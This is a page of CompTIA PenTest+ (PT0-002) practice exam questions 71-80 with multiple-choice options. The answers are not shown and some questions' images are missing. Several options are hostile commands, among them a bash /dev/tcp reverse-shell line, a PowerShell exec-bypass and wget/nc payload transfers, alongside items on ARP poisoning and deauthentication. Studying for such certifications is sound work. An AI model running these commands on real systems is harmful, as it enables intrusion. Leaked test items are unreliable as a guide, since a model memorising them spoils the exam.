Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: validbest

Discussions
  1. Home
  2. CompTIA
  3. PenTest+
  4. PT0-002
  5. CompTIA PenTest+ Certification Exam Questions and Answers

Pass the CompTIA PenTest+ PT0-002 Questions and answers with ValidTests

Exam PT0-002 All Questions
Exam PT0-002 Premium Access

View all detail and faqs for the PT0-002 exam

Go to Exam
Viewing page 8 out of 14 pages
Viewing questions 71-80 out of questions
Questions # 71:

The following line-numbered Python code snippet is being used in reconnaissance:

Question # 71

Which of the following line numbers from the script MOST likely contributed to the script triggering a “probable port scan” alert in the organization’s IDS?

Options:

A.

Line 01

B.

Line 02

C.

Line 07

D.

Line 08

Expert Solution
Questions # 72:

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

Options:

A.

Open-source research

B.

A ping sweep

C.

Traffic sniffing

D.

Port knocking

E.

A vulnerability scan

F.

An Nmap scan

Expert Solution
Questions # 73:

A penetration tester ran the following command on a staging server:

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

Options:

A.

nc 10.10.51.50 9891 < exploit

B.

powershell –exec bypass –f \\10.10.51.50\9891

C.

bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

D.

wget 10.10.51.50:9891/exploit

Expert Solution
Questions # 74:

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

Options:

A.

Key reinstallation

B.

Deauthentication

C.

Evil twin

D.

Replay

Expert Solution
Questions # 75:

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

Options:

A.

VRFY and EXPN

B.

VRFY and TURN

C.

EXPN and TURN

D.

RCPT TO and VRFY

Expert Solution
Questions # 76:

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Question # 76

Which of the following represents what the penetration tester is attempting to accomplish?

Options:

A.

DNS cache poisoning

B.

MAC spoofing

C.

ARP poisoning

D.

Double-tagging attack

Expert Solution
Questions # 77:

A penetration tester performs the following command:

curl –I –http2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

Question # 77

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Expert Solution
Questions # 78:

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

Options:

A.

Run another scanner to compare.

B.

Perform a manual test on the server.

C.

Check the results on the scanner.

D.

Look for the vulnerability online.

Expert Solution
Questions # 79:

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Options:

A.

Perform forensic analysis to isolate the means of compromise and determine attribution.

B.

Incorporate the newly identified method of compromise into the red team’s approach.

C.

Create a detailed document of findings before continuing with the assessment.

D.

Halt the assessment and follow the reporting procedures as outlined in the contract.

Expert Solution
Questions # 80:

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap –O –A –sS –p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

Options:

A.

A firewall or IPS blocked the scan.

B.

The penetration tester used unsupported flags.

C.

The edge network device was disconnected.

D.

The scan returned ICMP echo replies.

Expert Solution
Viewing page 8 out of 14 pages
Viewing questions 71-80 out of questions